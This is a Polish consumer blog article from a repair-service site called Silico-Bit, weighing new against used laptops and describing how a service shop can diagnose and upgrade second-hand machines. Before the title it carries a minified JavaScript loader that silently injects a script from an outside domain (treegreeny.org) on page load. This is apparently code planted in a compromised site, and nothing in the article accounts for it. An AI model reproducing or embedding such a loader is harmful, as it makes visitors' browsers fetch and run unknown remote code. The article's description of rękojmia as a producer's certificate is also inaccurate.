;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Używany laptop – sprawdź jak serwis laptopów pomoże Ci zaoszczędzić | Silico-Bit
Zakup laptopa czy jakiegokolwiek innego sprzętu elektronicznego zawsze wiąże się ze sporym wydatkiem. Jest na to sposób – używany laptop. Wiele osób broni się przed zakupem sprzętu z drugiej ręki, zupełnie niepotrzebnie. Ważne, aby pochodziło z pewnego źródła i abyśmy mieli kompletną wiedzę o ewentualnych usterkach, jeszcze przez kupnem. Wówczas taka inwestycja pozwala mieć dobry sprzęt, za niewielkie pieniądze. Na co zwrócić uwagę i dlaczego to w serwisie powinniśmy szukać powierników naszego pomysłu?

Zalety i wady zakupu nowego sprzętu

Nowy sprzęt jest z pewnością tym wymarzonym i wyczekanym zakupem. Oferuje duży wybór wśród najnowszych modeli i znakomite warunki techniczne. Co najważniejsze, dzięki kupnie sprzętu w sklepie, otrzymujemy rękojmię, czyli poświadczenie producenta o jakości produktu. Dzięki niej w razie potrzeby możemy dokonać bezpłatnej reklamacji. Dodatkowo sprzedawca może oferować gwarancję na sprzęt, która także obliguje go do bezpłatnej naprawy, wymiany sprzętu na nowy lub zwrotu kosztów, przez cały okres jej trwania.

Nowy laptop

Niestety nowy laptop ma jedną zasadniczą wadę – na jego zakup musimy przeznaczyć co najmniej 2 tysiące złotych za sprzęt, który będzie technicznie względny. Oczywiście wszystko zależy od tego, do czego laptop ma służyć. Inne parametry będą potrzebne do instalacji specjalistycznych programów, a inne do zwykłych prac biurowych czy edytorskich. Jeszcze inny rodzaj laptopa potrzebny jest do gamingu. Producenci oferują dedykowane laptopy do różnego rodzaju potrzeb.

Używany laptop – czy warto?

Zakup nowego sprzętu z pewnością jest inwestycją przemyślaną. Czasami potrzeba wielu miesięcy, aby uzbierać potrzebną kwotę. A co w momencie, kiedy decyzja musi być podjęta szybko, a na zbieranie dużej kwoty nie ma czasu? W sytuacjach, w których twój stary laptop uległ uszkodzeniu lub kradzieży, a Ty nie możesz pozwolić sobie na jego całkowity brak, musisz posiłkować się innymi rozwiązaniami. Wówczas zakup używanego laptopa jest znakomitym wyjściem z sytuacji.

Wady używanych laptopów

Używany laptop oczywiście nie jest bez mankamentów. Przede wszystkim nie mamy pewności co do tego, jakie konkretnie wady zawiera. Nie będzie to też najnowszy sprzęt, a jeśli nawet ktoś będzie chciał sprzedać praktycznie nowy laptop, cena będzie stosunkowo podobna do tej rynkowej. Warto więc odkupić używany laptop od kogoś znajomego, kto nie będzie ukrywał przed nami usterek. Laptop z drugiej ręki zazwyczaj nie posiada już rękojmi i gwarancji, nie mamy więc możliwości bezpłatnej naprawy czy wymiany.

Używany laptop

Zalety używanych laptopów

Do zakupu używanego laptopa z pewnością przekonuje nas niższa cena. I to o wiele niższa niż ta, która obowiązuje w sklepie za nowy sprzęt. Co więcej, nie obowiązuje już na niego gwarancja ani rękojmia, możemy więc dowolnie wymieniać podzespoły na lepsze, instalować nowe oprogramowania i wymieniać te elementy, które naszym zdaniem będą powodowały lepsze działanie sprzętu. Do tego przyda się wyspecjalizowany serwis.

Co oferuje serwis?

Serwis sprzętu dokona dokładnej diagnozy laptopa i wyceni ewentualną naprawę lub instalację nowych podzespołów, a także koszty części. Warto zaznaczyć, że zakup używanego laptopa i ewentualne koszty wycenione przez serwis w dalszym ciągu pozwalają zaoszczędzić naprawdę sporo pieniędzy. W związku z tym warto wziąć pod uwagę takie rozwiązanie, jeśli potrzebujemy sprzętu tu i teraz. Pamiętajmy jednak, aby dokładnie sprawdzić jego pochodzenie, np. poprzez pierwotny dowód zakupu.